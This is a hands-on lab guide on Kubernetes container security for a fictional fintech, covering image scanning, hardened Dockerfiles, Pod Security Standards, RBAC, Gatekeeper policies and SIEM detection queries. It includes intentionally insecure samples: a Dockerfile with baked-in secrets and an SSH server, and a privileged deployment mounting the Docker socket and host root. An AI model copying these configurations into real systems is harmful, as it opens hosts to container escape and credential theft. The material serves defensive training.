Lab 21: Cloud Container Security

Chapter: 20 — Cloud Attack & Defense Playbook
Difficulty: ⭐⭐⭐ Intermediate-Advanced
Estimated Time: 5–6 hours
Prerequisites: Chapter 20, Chapter 30, basic Docker and Kubernetes knowledge


Overview

In this lab you will:

  1. Harden container images using multi-stage builds, distroless bases, and vulnerability scanning with Trivy and Grype
  2. Enforce Kubernetes Pod Security Standards (Restricted/Baseline/Privileged) with SecurityContext, RBAC, and admission controllers
  3. Simulate and detect container escape techniques including Docker socket abuse, privileged container breakout, and kernel exploits
  4. Implement Kubernetes NetworkPolicy, Calico/Cilium rules, and Istio service mesh security with mTLS
  5. Deploy runtime security monitoring with Falco rules, eBPF-based detection, and container forensics workflows
  6. Write KQL and SPL detection queries for every attack technique covered

Synthetic Data Only

All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) or RFC 1918 (10.0.0.0/8, 172.16.0.0/12) reserved ranges. All domains use *.example.com. No real applications, real credentials, or real infrastructure are referenced. All credentials shown as REDACTED. This lab is for defensive education only — never use these techniques against systems you do not own or without explicit written authorization.


Scenario

Engagement Brief — NovaStar Fintech

Organization: NovaStar Fintech (fictional)
Platform: CloudPay — microservices payment processing platform
Cluster: cloudpay-prod.k8s.example.com (SYNTHETIC)
Registry: registry.novstar.example.com (SYNTHETIC)
API Server: https://203.0.113.10:6443 (SYNTHETIC — RFC 5737)
Node Network: 10.50.0.0/16 (SYNTHETIC)
Pod Network: 10.244.0.0/16 (SYNTHETIC)
Service Network: 10.96.0.0/12 (SYNTHETIC)
Cloud Provider: AWS EKS (SYNTHETIC — Account ID 123456789012)
Engagement Type: Container security assessment — offensive and defensive
Scope: All Kubernetes workloads, container images, runtime configurations, network policies
Out of Scope: Underlying EC2 instances (OS-level), AWS control plane, DNS infrastructure
Test Window: 2026-03-24 08:00 – 2026-03-26 20:00 UTC
Emergency Contact: soc@novstar.example.com (SYNTHETIC)

Summary: NovaStar Fintech runs its CloudPay payment processing platform on Kubernetes (AWS EKS). After a recent industry breach involving container escape, the security team has commissioned a full container security assessment. Your mission is to evaluate image security, pod configurations, network segmentation, and runtime monitoring — then harden the environment against the threats you discover.


Certification Relevance

Certification Mapping

This lab maps to objectives in the following certifications:

Certification Relevant Domains
CKS (Certified Kubernetes Security Specialist) Cluster Setup (10%), System Hardening (15%), Minimize Microservice Vulnerabilities (20%), Supply Chain Security (20%), Monitoring/Logging/Runtime Security (20%)
CKAD (Certified Kubernetes Application Developer) Application Design (20%), Pod Design, Configuration (18%)
AWS Certified Security — Specialty (SCS-C02) Domain 3: Infrastructure Protection, Domain 4: Identity and Access Management
CompTIA Cloud+ (CV0-004) Domain 2: Security (22%), Domain 3: Deployment (24%)
CompTIA CySA+ (CS0-003) Domain 2: Vulnerability Management, Domain 4: Incident Response

Prerequisites

Required Tools

Tool Purpose Version
Docker Container runtime 24.x+
kubectl Kubernetes CLI 1.28+
minikube or kind Local Kubernetes cluster Latest
Trivy Image vulnerability scanner 0.50+
Grype Image vulnerability scanner 0.74+
Falco Runtime security monitoring 0.37+
Helm Kubernetes package manager 3.14+
istioctl Istio service mesh CLI 1.20+
curl / jq HTTP testing / JSON parsing Latest

Test Accounts (Synthetic)

Role Username Token Notes
Cluster Admin admin REDACTED Full cluster access
Developer testuser REDACTED Namespace-scoped access
CI/CD Service Account deploy-bot REDACTED Deployment only
Auditor auditor REDACTED Read-only access

Lab Environment Setup

# Create a local Kubernetes cluster with kind (SYNTHETIC)
$ kind create cluster --name cloudpay-lab --config kind-config.yaml
Creating cluster "cloudpay-lab" ...
  Ensuring node image (kindest/node:v1.29.2) 🖼
  Preparing nodes 📦 📦 📦
  Writing configuration 📝
  Starting control-plane 🕹️
  Installing CNI 🔌
  Installing StorageClass 💾
  Joining worker nodes 🚜
Set kubectl context to "kind-cloudpay-lab"

# Verify cluster is running
$ kubectl cluster-info --context kind-cloudpay-lab
Kubernetes control plane is running at https://127.0.0.1:46789
CoreDNS is running at https://127.0.0.1:46789/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy

# Create namespaces for the lab
$ kubectl create namespace cloudpay-prod
namespace/cloudpay-prod created

$ kubectl create namespace cloudpay-staging
namespace/cloudpay-staging created

$ kubectl create namespace monitoring
namespace/monitoring created

$ kubectl create namespace istio-system
namespace/istio-system created

Lab Architecture (Synthetic)

┌──────────────────────────────────────────────────────────────────────┐
│             NovaStar CloudPay — Kubernetes Architecture              │
│                                                                      │
│  ┌────────────────────────────────────────────────────────────────┐  │
│  │                  AWS EKS Cluster (SYNTHETIC)                   │  │
│  │                 203.0.113.10:6443 — API Server                 │  │
│  │                                                                │  │
│  │  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐          │  │
│  │  │ Node 1       │  │ Node 2       │  │ Node 3       │          │  │
│  │  │ 10.50.1.10   │  │ 10.50.1.20   │  │ 10.50.1.30   │          │  │
│  │  │              │  │              │  │              │          │  │
│  │  │ ┌──────────┐ │  │ ┌──────────┐ │  │ ┌──────────┐ │          │  │
│  │  │ │ payment  │ │  │ │ auth-svc │ │  │ │ reporting│ │          │  │
│  │  │ │ gateway  │ │  │ │          │ │  │ │ service  │ │          │  │
│  │  │ └──────────┘ │  │ └──────────┘ │  │ └──────────┘ │          │  │
│  │  │ ┌──────────┐ │  │ ┌──────────┐ │  │ ┌──────────┐ │          │  │
│  │  │ │ order-   │ │  │ │ user-    │ │  │ │ notif-   │ │          │  │
│  │  │ │ service  │ │  │ │ service  │ │  │ │ service  │ │          │  │
│  │  │ └──────────┘ │  │ └──────────┘ │  │ └──────────┘ │          │  │
│  │  └──────────────┘  └──────────────┘  └──────────────┘          │  │
│  │                                                                │  │
│  │  ┌───────────────────────────────────────────────┐             │  │
│  │  │ Shared Services                               │             │  │
│  │  │ PostgreSQL (10.50.2.10) | Redis (10.50.2.20)  │             │  │
│  │  │ Kafka (10.50.2.30)      | Vault (10.50.2.40)  │             │  │
│  │  └───────────────────────────────────────────────┘             │  │
│  └────────────────────────────────────────────────────────────────┘  │
│                                                                      │
│  ┌─────────────────────┐    ┌─────────────────────┐                  │
│  │ Container Registry  │    │ Monitoring Stack    │                  │
│  │ registry.novstar    │    │ Prometheus/Grafana  │                  │
│  │ .example.com        │    │ Falco / Fluentd     │                  │
│  └─────────────────────┘    └─────────────────────┘                  │
└──────────────────────────────────────────────────────────────────────┘

Exercise 1: Container Image Security

Objective

Evaluate and harden container images used in the CloudPay platform. You will identify vulnerabilities in existing images, implement multi-stage builds with distroless base images, and establish an image scanning pipeline.

Prerequisites

  • Docker installed and running
  • Trivy and Grype CLI tools installed
  • Access to the synthetic registry registry.novstar.example.com

Step 1.1: Audit the Existing Dockerfile

The CloudPay payment gateway uses the following vulnerable Dockerfile:

# VULNERABLE Dockerfile — payment-gateway (SYNTHETIC)
# DO NOT use in production — this is intentionally insecure for educational purposes

FROM ubuntu:22.04

# Anti-pattern: Running as root
# Anti-pattern: Installing unnecessary packages
RUN apt-get update && apt-get install -y \
    python3 python3-pip \
    curl wget netcat nmap \
    vim nano \
    ssh openssh-server \
    && rm -rf /var/lib/apt/lists/*

# Anti-pattern: Embedding secrets in image layers
ENV DB_PASSWORD="REDACTED"
ENV API_KEY="REDACTED"
ENV AWS_ACCESS_KEY_ID="REDACTED"
ENV AWS_SECRET_ACCESS_KEY="REDACTED"

# Anti-pattern: Copying entire project including .git, tests, docs
COPY . /app
WORKDIR /app

# Anti-pattern: Installing all dependencies including dev
RUN pip3 install -r requirements.txt

# Anti-pattern: Exposing unnecessary ports
EXPOSE 8080 22 5432

# Anti-pattern: Running as root with no health check
CMD ["python3", "app.py"]

Identify the security issues:

Issue Category Severity Description
1 Base Image High Full Ubuntu image includes unnecessary attack surface (shells, package managers, utilities)
2 Root User Critical Container runs as root — any compromise gives root access to the container filesystem
3 Embedded Secrets Critical Credentials baked into environment variables visible in image layers
4 Unnecessary Packages High Network tools (nmap, netcat), SSH server, editors expand attack surface
5 No .dockerignore Medium .git, tests, documentation copied into image
6 Dev Dependencies Medium Development packages installed in production image
7 Exposed Ports Medium SSH (22) and database (5432) ports unnecessarily exposed
8 No Health Check Low No HEALTHCHECK instruction for orchestrator health monitoring
9 No Image Signing Medium Image not signed — no guarantee of integrity
10 Mutable Tag Medium No pinned digest — ubuntu:22.04 can be replaced by attacker
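The audit above can be partially automated. The sketch below is a hypothetical mini-linter that flags a few of the listed anti-patterns by inspecting Dockerfile text; real tools (hadolint, Trivy's misconfiguration checks) are far more thorough, so treat this as an illustration of the checks, not a replacement.

```python
import re

def lint_dockerfile(text: str) -> list[str]:
    """Flag a subset of the anti-patterns from the audit table."""
    findings = []
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    # Issue 2: no USER instruction means the container runs as root
    if not any(l.upper().startswith("USER") for l in lines):
        findings.append("runs as root (no USER instruction)")
    for l in lines:
        # Issue 10: base image not pinned to an immutable digest
        if l.upper().startswith("FROM") and "@sha256:" not in l:
            findings.append(f"mutable base image tag: {l}")
        # Issue 3: likely credential baked into an ENV layer
        if l.upper().startswith("ENV") and re.search(
                r"(PASSWORD|SECRET|API_KEY|ACCESS_KEY)", l, re.I):
            findings.append(f"possible secret in ENV: {l.split('=')[0]}")
        # Issue 7: SSH/database ports exposed from an app container
        if l.upper().startswith("EXPOSE"):
            risky = [p for p in re.findall(r"\d+", l)
                     if p in ("22", "5432", "3306")]
            if risky:
                findings.append(f"risky exposed ports: {risky}")
    # Issue 8: no HEALTHCHECK instruction
    if not any(l.upper().startswith("HEALTHCHECK") for l in lines):
        findings.append("no HEALTHCHECK instruction")
    return findings
```

Running this against the vulnerable Dockerfile above surfaces the root user, mutable tag, embedded secrets, risky ports, and missing health check; the hardened Dockerfile in Step 1.4 passes every check.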

Step 1.2: Scan Images with Trivy

# Scan the vulnerable image (SYNTHETIC)
$ trivy image registry.novstar.example.com/payment-gateway:v2.1.0

2026-03-24T10:15:32Z  INFO  Vulnerability DB loaded
2026-03-24T10:15:34Z  INFO  Detected OS: ubuntu 22.04

registry.novstar.example.com/payment-gateway:v2.1.0 (ubuntu 22.04)

Total: 247 (UNKNOWN: 3, LOW: 68, MEDIUM: 112, HIGH: 51, CRITICAL: 13)

Library          Vulnerability    Severity   Installed Version           Fixed Version         Title
libssl3          CVE-2024-XXXXX   CRITICAL   3.0.2-0ubuntu1.12           3.0.2-0ubuntu1.15     OpenSSL: Buffer overflow in X.509 certificate verification
openssh-server   CVE-2024-XXXXX   CRITICAL   1:8.9p1-3ubuntu0.6          1:8.9p1-3ubuntu0.10   OpenSSH: Remote code execution via crafted authentication
python3.10       CVE-2024-XXXXX   HIGH       3.10.6-1~22.04.2            3.10.6-1~22.04.5      Python: Arbitrary code execution via crafted pickle data
curl             CVE-2024-XXXXX   HIGH       7.81.0-1ubuntu1.15          7.81.0-1ubuntu1.18    curl: HSTS bypass via IDN
nmap             CVE-2024-XXXXX   MEDIUM     7.91+dfsg1+really-1build1   -                     Nmap: Script engine RCE

Python (pip)
Total: 18 (HIGH: 8, CRITICAL: 3, MEDIUM: 5, LOW: 2)

Library        Vulnerability    Severity   Installed Version   Fixed Version   Title
cryptography   CVE-2024-XXXXX   CRITICAL   38.0.1              42.0.0          cryptography: NULL pointer deref in PKCS12 parsing
Flask          CVE-2024-XXXXX   HIGH       2.2.2               2.3.3           Flask: Session cookie tampering
requests       CVE-2024-XXXXX   HIGH       2.28.0              2.31.0          requests: Unintended credential exposure on redirect
Werkzeug       CVE-2024-XXXXX   HIGH       2.2.2               2.3.8           Werkzeug: Debugger PIN bypass

Secrets found in image:
  /app/.env  AWS_ACCESS_KEY_ID=REDACTED
  /app/.env  AWS_SECRET_ACCESS_KEY=REDACTED
  /app/config/database.yml  password: REDACTED

Step 1.3: Scan with Grype for Comparison

# Scan the same image with Grype (SYNTHETIC)
$ grype registry.novstar.example.com/payment-gateway:v2.1.0

  Vulnerability DB loaded
  Loaded image
  Parsed image
  Cataloged packages      [312 packages]
  Scanned for vulnerabilities     [265 vulnerability matches]

NAME                INSTALLED     FIXED-IN      TYPE    VULNERABILITY   SEVERITY
cryptography        38.0.1        42.0.0        python  CVE-2024-XXXXX  Critical
libssl3             3.0.2-0ubu... 3.0.2-0ubu... deb     CVE-2024-XXXXX  Critical
openssh-server      1:8.9p1-3...  1:8.9p1-3...  deb     CVE-2024-XXXXX  Critical
Flask               2.2.2         2.3.3         python  CVE-2024-XXXXX  High
python3.10          3.10.6-1~...  3.10.6-1~...  deb     CVE-2024-XXXXX  High
requests            2.28.0        2.31.0        python  CVE-2024-XXXXX  High
Werkzeug            2.2.2         2.3.8         python  CVE-2024-XXXXX  High
curl                7.81.0-1...   7.81.0-1...   deb     CVE-2024-XXXXX  High
...

265 vulnerabilities found (13 critical, 51 high, 112 medium, 68 low, 3 unknown, 18 negligible)

Step 1.4: Create a Hardened Dockerfile

# HARDENED Dockerfile — payment-gateway (SYNTHETIC)
# Multi-stage build with distroless base

# ============================================
# Stage 1: Build stage
# ============================================
FROM python:3.11-slim@sha256:abc123def456... AS builder

# Create non-root user for build
RUN groupadd -r appuser && useradd -r -g appuser -d /home/appuser appuser

WORKDIR /build

# Copy only dependency files first (leverage Docker layer caching)
COPY requirements.txt .

# Install production dependencies only
RUN pip install --no-cache-dir --prefix=/install -r requirements.txt

# Copy application code (after dependencies for better caching)
COPY src/ ./src/
COPY config/production.yaml ./config/

# ============================================
# Stage 2: Production stage — distroless
# ============================================
FROM gcr.io/distroless/python3-debian12@sha256:def789ghi012...

# Copy installed packages from builder
COPY --from=builder /install /usr/local

# Copy application from builder
COPY --from=builder /build/src /app/src
COPY --from=builder /build/config /app/config

WORKDIR /app

# Run as an unprivileged UID (65534 = "nobody"; distroless images also
# ship a dedicated nonroot user, UID 65532)
USER 65534:65534

# Only expose the application port
EXPOSE 8080

# HEALTHCHECK is honored by Docker/Compose; Kubernetes ignores it and
# instead uses the readiness/liveness probes defined in the pod spec
# Note: distroless has no shell — use exec form only
HEALTHCHECK --interval=30s --timeout=5s --retries=3 \
    CMD ["/usr/local/bin/python3", "/app/src/healthcheck.py"]

ENTRYPOINT ["/usr/local/bin/python3"]
CMD ["/app/src/app.py"]

Step 1.5: Create .dockerignore

# .dockerignore — prevent sensitive files from entering the image
.git
.gitignore
.env
.env.*
*.md
*.txt
!requirements.txt
Dockerfile*
docker-compose*
tests/
docs/
scripts/
*.pyc
__pycache__/
.pytest_cache/
.coverage
htmlcov/
*.pem
*.key
*.crt
credentials/
secrets/
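.dockerignore patterns are evaluated in order, with the last matching pattern winning and a leading `!` re-including a previously excluded path — which is why `!requirements.txt` must come after `*.txt`. The sketch below is a rough model of that evaluation using `fnmatch`; Docker's real matcher (Go `filepath.Match` plus `**` handling) differs in edge cases, so this is only for reasoning about pattern order.

```python
from fnmatch import fnmatch

def excluded(path: str, patterns: list[str]) -> bool:
    """Approximate .dockerignore semantics: last matching pattern wins."""
    result = False  # paths are included unless a pattern excludes them
    for pat in patterns:
        negate = pat.startswith("!")
        if negate:
            pat = pat[1:]
        base = pat.rstrip("/")
        # match the path itself, or anything under a directory pattern
        if fnmatch(path, pat) or fnmatch(path, base + "/*") \
                or path.startswith(base + "/"):
            result = not negate
    return result

ignore = [".env", "*.txt", "!requirements.txt", "tests/", "*.pem"]
```

Note the ordering dependency: `excluded("requirements.txt", ignore)` is False only because the negation appears after `*.txt`; reversing those two lines would exclude it.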

Step 1.6: Scan the Hardened Image

# Build the hardened image (SYNTHETIC)
$ docker build -t registry.novstar.example.com/payment-gateway:v2.2.0-hardened .

# Scan the hardened image
$ trivy image registry.novstar.example.com/payment-gateway:v2.2.0-hardened

registry.novstar.example.com/payment-gateway:v2.2.0-hardened (debian 12)

Total: 12 (LOW: 5, MEDIUM: 5, HIGH: 2, CRITICAL: 0)

# Compare sizes
$ docker images | grep payment-gateway
payment-gateway   v2.1.0          1.2GB
payment-gateway   v2.2.0-hardened 89MB

Reduction summary:

Metric Before After Improvement
Total Vulnerabilities 265 12 95.5% reduction
Critical 13 0 100% eliminated
High 51 2 96% reduction
Image Size 1.2 GB 89 MB 93% smaller
Installed Packages 312 47 85% fewer
Secrets in Image 3 0 100% eliminated
Runs as Root Yes No Non-root
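The improvement percentages in the table are straightforward to reproduce (values rounded to one decimal; the table rounds to whole percent):

```python
def reduction(before: float, after: float) -> float:
    """Percent reduction from before to after, one decimal place."""
    return round((before - after) / before * 100, 1)

# 265 -> 12 total vulnerabilities: 95.5% reduction
# 13 -> 0 criticals: 100.0% eliminated
```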

Step 1.7: Implement Image Policy with Cosign

# Sign the hardened image with cosign (SYNTHETIC)
$ cosign sign --key cosign.key registry.novstar.example.com/payment-gateway:v2.2.0-hardened

Pushing signature to: registry.novstar.example.com/payment-gateway:sha256-abc123...sig

# Verify the signature
$ cosign verify --key cosign.pub registry.novstar.example.com/payment-gateway:v2.2.0-hardened

Verification for registry.novstar.example.com/payment-gateway:v2.2.0-hardened --
The following checks were performed on each of these signatures:
  - The cosign claims were validated
  - The signatures were verified against the specified public key

[{"critical":{"identity":{"docker-reference":"registry.novstar.example.com/payment-gateway"},
"image":{"docker-manifest-digest":"sha256:abc123def456..."},
"type":"cosign container image signature"},
"optional":{"timestamp":"2026-03-24T10:30:00Z"}}]

Detection Queries — Image Security

KQL — Detect unscanned images deployed to cluster:

// KQL: Detect container images deployed without vulnerability scan
ContainerInventory
| where TimeGenerated > ago(24h)
| where ImageTag !contains "hardened" and ImageTag !contains "scanned"
| join kind=leftanti (
    SecurityAssessment
    | where AssessmentType == "ContainerImageScan"
    | where TimeGenerated > ago(7d)
    | project ImageName = tostring(parse_json(ExtendedProperties).ImageName)
) on $left.Image == $right.ImageName
| project TimeGenerated, Computer, ContainerID, Image, ImageTag, Namespace
| summarize Count=count() by Image, Namespace
| where Count > 0
| sort by Count desc

SPL — Detect images pulled from untrusted registries:

index=kubernetes sourcetype="kube:container:event"
| eval image=coalesce('spec.containers{}.image', 'status.containerStatuses{}.image')
| where isnotnull(image)
| eval trusted_registry=if(match(image, "^(registry\.novstar\.example\.com|gcr\.io/distroless)"), "yes", "no")
| where trusted_registry="no"
| stats count by image, namespace, pod_name, _time
| sort -count
| rename image as "Untrusted Image", namespace as "Namespace", pod_name as "Pod"
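The SPL `match()` call above reduces to an anchored allow-list check. The same logic as a unit-testable function (the registry list is this lab's synthetic allow-list, not a general recommendation) — anchoring with `^` matters, since an attacker can embed a trusted registry name later in an image reference:

```python
import re

# Anchored allow-list of trusted registries (SYNTHETIC, from the lab)
TRUSTED = re.compile(r"^(registry\.novstar\.example\.com|gcr\.io/distroless)")

def is_trusted(image: str) -> bool:
    """Return True if the image reference starts with a trusted registry."""
    return bool(TRUSTED.match(image))
```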

Key Takeaways — Exercise 1

Image Security Principles

  1. Minimize attack surface — Use distroless or scratch base images; remove shells, package managers, and debugging tools from production
  2. Pin image digests — Never rely on mutable tags; always pin to SHA256 digests
  3. Multi-stage builds — Separate build dependencies from runtime to reduce image size and vulnerability count
  4. Never embed secrets — Use Kubernetes Secrets, Vault, or CSI drivers for credential injection at runtime
  5. Scan continuously — Integrate Trivy/Grype into CI/CD and scan on a schedule; vulnerabilities emerge after deployment
  6. Sign and verify — Use cosign or Notary to ensure image integrity and provenance

Exercise 2: Kubernetes Pod Security

Objective

Implement and enforce Pod Security Standards across the CloudPay cluster. Configure SecurityContext, RBAC policies, service account hardening, and OPA Gatekeeper admission controllers.

Prerequisites

  • Kubernetes cluster running (from Lab Environment Setup)
  • kubectl configured with admin access
  • Helm installed for Gatekeeper deployment

Step 2.1: Audit Existing Pod Security

Examine the current (insecure) deployment for the payment gateway:

# INSECURE deployment — payment-gateway (SYNTHETIC)
# DO NOT use in production — intentionally insecure for educational purposes
apiVersion: apps/v1
kind: Deployment
metadata:
  name: payment-gateway
  namespace: cloudpay-prod
spec:
  replicas: 3
  selector:
    matchLabels:
      app: payment-gateway
  template:
    metadata:
      labels:
        app: payment-gateway
    spec:
      # Anti-pattern: using default service account
      # Anti-pattern: no securityContext
      # Anti-pattern: no resource limits
      containers:
      - name: payment-gateway
        image: registry.novstar.example.com/payment-gateway:v2.1.0
        ports:
        - containerPort: 8080
        # Anti-pattern: privileged container
        securityContext:
          privileged: true
          runAsUser: 0  # run as root (runAsNonRoot left unset)
        # Anti-pattern: mounting Docker socket
        volumeMounts:
        - name: docker-sock
          mountPath: /var/run/docker.sock
        - name: host-filesystem
          mountPath: /host
        # Anti-pattern: no resource limits (enables noisy neighbor / DoS)
        env:
        - name: DB_PASSWORD
          value: "REDACTED"
      volumes:
      - name: docker-sock
        hostPath:
          path: /var/run/docker.sock
      - name: host-filesystem
        hostPath:
          path: /
          type: Directory

Security issues identified:

Issue Severity Impact
privileged: true Critical Full host kernel access; trivial container escape
Docker socket mounted Critical Can create containers on host; full host compromise
Host filesystem mounted at / Critical Read/write access to entire host filesystem
Running as root High Unnecessary privilege inside container
Default service account High May have excessive RBAC permissions
Secrets in env vars High Visible in pod spec, kubectl describe, and process listing
No resource limits Medium Enables CPU/memory DoS against other pods
No network policy Medium Unrestricted lateral movement within cluster
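Several of these issues can be caught mechanically from a pod spec (e.g. the `.spec` object from `kubectl get pod -o json`). The sketch below checks for a subset of the table's findings; field paths follow the Kubernetes Pod schema, but the rule set is illustrative, not complete — production clusters should rely on admission control (Step 2.5) rather than after-the-fact scripts.

```python
def audit_pod_spec(spec: dict) -> list[str]:
    """Flag a subset of the pod security issues from the table above."""
    findings = []
    host_paths = {v.get("hostPath", {}).get("path")
                  for v in spec.get("volumes", []) if "hostPath" in v}
    if "/var/run/docker.sock" in host_paths:
        findings.append("CRITICAL: Docker socket mounted")
    if "/" in host_paths:
        findings.append("CRITICAL: host root filesystem mounted")
    for c in spec.get("containers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"CRITICAL: privileged container {c['name']}")
        if not c.get("resources", {}).get("limits"):
            findings.append(f"MEDIUM: no resource limits on {c['name']}")
        for e in c.get("env", []):
            if "value" in e and any(k in e.get("name", "").upper()
                                    for k in ("PASSWORD", "SECRET", "KEY")):
                findings.append(f"HIGH: secret in env var {e['name']}")
    if spec.get("serviceAccountName", "default") == "default":
        findings.append("HIGH: default service account in use")
    return findings
```

Fed the insecure deployment's pod spec, this reports the Docker socket, host filesystem, privileged flag, plaintext secret, missing limits, and default service account; the hardened deployment in Step 2.3 produces no findings.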

Step 2.2: Apply Pod Security Standards

Kubernetes provides three built-in Pod Security Standards: Privileged, Baseline, and Restricted.

# Label namespace to enforce Restricted Pod Security Standard
$ kubectl label namespace cloudpay-prod \
    pod-security.kubernetes.io/enforce=restricted \
    pod-security.kubernetes.io/enforce-version=latest \
    pod-security.kubernetes.io/audit=restricted \
    pod-security.kubernetes.io/audit-version=latest \
    pod-security.kubernetes.io/warn=restricted \
    pod-security.kubernetes.io/warn-version=latest

namespace/cloudpay-prod labeled

# Verify labels
$ kubectl get namespace cloudpay-prod -o jsonpath='{.metadata.labels}' | jq .
{
  "kubernetes.io/metadata.name": "cloudpay-prod",
  "pod-security.kubernetes.io/enforce": "restricted",
  "pod-security.kubernetes.io/enforce-version": "latest",
  "pod-security.kubernetes.io/audit": "restricted",
  "pod-security.kubernetes.io/audit-version": "latest",
  "pod-security.kubernetes.io/warn": "restricted",
  "pod-security.kubernetes.io/warn-version": "latest"
}

# Try deploying the insecure pod — it will be rejected
$ kubectl apply -f insecure-payment-gateway.yaml
Error from server (Forbidden): error when creating "insecure-payment-gateway.yaml":
pods "payment-gateway" is forbidden: violates PodSecurity "restricted:latest":
  privileged (container "payment-gateway" must not set securityContext.privileged=true),
  runAsNonRoot (pod or container "payment-gateway" must set securityContext.runAsNonRoot=true),
  hostPath volumes (volumes "docker-sock", "host-filesystem" uses disallowed hostPath),
  seccompProfile (pod or container "payment-gateway" must set securityContext.seccompProfile.type)

Step 2.3: Create a Hardened Deployment

# HARDENED deployment — payment-gateway (SYNTHETIC)
apiVersion: apps/v1
kind: Deployment
metadata:
  name: payment-gateway
  namespace: cloudpay-prod
  labels:
    app: payment-gateway
    tier: backend
    version: v2.2.0
spec:
  replicas: 3
  selector:
    matchLabels:
      app: payment-gateway
  template:
    metadata:
      labels:
        app: payment-gateway
        tier: backend
    spec:
      # Use a dedicated service account with minimal permissions
      serviceAccountName: payment-gateway-sa
      automountServiceAccountToken: false

      # Pod-level security context
      securityContext:
        runAsNonRoot: true
        runAsUser: 65534
        runAsGroup: 65534
        fsGroup: 65534
        seccompProfile:
          type: RuntimeDefault

      containers:
      - name: payment-gateway
        image: registry.novstar.example.com/payment-gateway:v2.2.0-hardened@sha256:abc123def456...
        ports:
        - containerPort: 8080
          protocol: TCP

        # Container-level security context
        securityContext:
          allowPrivilegeEscalation: false
          readOnlyRootFilesystem: true
          runAsNonRoot: true
          runAsUser: 65534
          capabilities:
            drop:
              - ALL
          seccompProfile:
            type: RuntimeDefault

        # Resource limits prevent DoS
        resources:
          requests:
            cpu: 100m
            memory: 128Mi
          limits:
            cpu: 500m
            memory: 512Mi

        # Health checks for orchestrator
        readinessProbe:
          httpGet:
            path: /healthz
            port: 8080
          initialDelaySeconds: 5
          periodSeconds: 10
        livenessProbe:
          httpGet:
            path: /healthz
            port: 8080
          initialDelaySeconds: 15
          periodSeconds: 20

        # Secrets from Kubernetes Secrets — not env vars
        envFrom:
        - secretRef:
            name: payment-gateway-secrets

        # Writable temp directory using emptyDir
        volumeMounts:
        - name: tmp-volume
          mountPath: /tmp
        - name: cache-volume
          mountPath: /app/cache

      volumes:
      - name: tmp-volume
        emptyDir:
          medium: Memory
          sizeLimit: 64Mi
      - name: cache-volume
        emptyDir:
          sizeLimit: 128Mi

Step 2.4: Configure RBAC — Least Privilege

# Service account for payment-gateway (SYNTHETIC)
apiVersion: v1
kind: ServiceAccount
metadata:
  name: payment-gateway-sa
  namespace: cloudpay-prod
  annotations:
    description: "Minimal service account for payment gateway pods"
automountServiceAccountToken: false

---
# Role with minimal permissions
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: payment-gateway-role
  namespace: cloudpay-prod
rules:
# Only read ConfigMaps needed by the application
- apiGroups: [""]
  resources: ["configmaps"]
  resourceNames: ["payment-gateway-config"]
  verbs: ["get", "watch"]
# Only read own Secrets
- apiGroups: [""]
  resources: ["secrets"]
  resourceNames: ["payment-gateway-secrets"]
  verbs: ["get"]

---
# Bind the role to the service account
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: payment-gateway-binding
  namespace: cloudpay-prod
subjects:
- kind: ServiceAccount
  name: payment-gateway-sa
  namespace: cloudpay-prod
roleRef:
  kind: Role
  name: payment-gateway-role
  apiGroup: rbac.authorization.k8s.io

---
# Developer role — namespace-scoped (SYNTHETIC)
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: developer-role
  namespace: cloudpay-staging
rules:
- apiGroups: ["", "apps"]
  resources: ["pods", "deployments", "services", "configmaps"]
  verbs: ["get", "list", "watch", "create", "update", "patch"]
- apiGroups: [""]
  resources: ["pods/log"]
  verbs: ["get", "list"]
# Explicitly deny exec into pods in staging
# (absence of pods/exec means it is denied by default)

---
# Auditor role — read-only cluster-wide (SYNTHETIC)
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: security-auditor
rules:
- apiGroups: ["apps", "networking.k8s.io", "rbac.authorization.k8s.io"]
  resources: ["*"]
  verbs: ["get", "list", "watch"]
# RBAC is additive-only — there is no deny rule, and a wildcard grant on
# the core group would include secrets. To keep auditors away from secret
# values, enumerate core resources explicitly and omit "secrets".
- apiGroups: [""]
  resources: ["pods", "services", "configmaps", "serviceaccounts",
              "namespaces", "nodes", "events", "endpoints"]
  verbs: ["get", "list", "watch"]
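A common pitfall: Kubernetes RBAC is purely additive, so access is allowed if any rule matches, and a rule with an empty `verbs` list cannot revoke what another rule has already granted. The toy matcher below (wildcards simplified; real RBAC also handles resourceNames, subresources, and nonResourceURLs) demonstrates why secrets must be excluded by omission rather than by a "deny" rule:

```python
def allowed(rules: list[dict], api_group: str, resource: str, verb: str) -> bool:
    """Toy RBAC evaluation: access is granted if ANY rule matches."""
    for rule in rules:
        group_ok = api_group in rule["apiGroups"] or "*" in rule["apiGroups"]
        res_ok = resource in rule["resources"] or "*" in rule["resources"]
        verb_ok = verb in rule["verbs"] or "*" in rule["verbs"]
        if group_ok and res_ok and verb_ok:
            return True
    return False
```

Given a wildcard read rule on the core group plus a `secrets`/empty-verbs rule, `allowed(rules, "", "secrets", "get")` is still True — the empty-verbs rule is a no-op. Only enumerating core resources without `secrets` actually withholds access.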

Step 2.5: Deploy OPA Gatekeeper Admission Controller

# Install OPA Gatekeeper via Helm (SYNTHETIC)
$ helm repo add gatekeeper https://open-policy-agent.github.io/gatekeeper/charts
$ helm install gatekeeper gatekeeper/gatekeeper --namespace gatekeeper-system --create-namespace

NAME: gatekeeper
STATUS: deployed
REVISION: 1

Constraint Template — Block Privileged Containers:

# OPA Gatekeeper ConstraintTemplate (SYNTHETIC)
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8sblockprivileged
spec:
  crd:
    spec:
      names:
        kind: K8sBlockPrivileged
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8sblockprivileged

        violation[{"msg": msg}] {
          container := input.review.object.spec.containers[_]
          container.securityContext.privileged == true
          msg := sprintf("Privileged container not allowed: %v", [container.name])
        }

        violation[{"msg": msg}] {
          container := input.review.object.spec.initContainers[_]
          container.securityContext.privileged == true
          msg := sprintf("Privileged init container not allowed: %v", [container.name])
        }
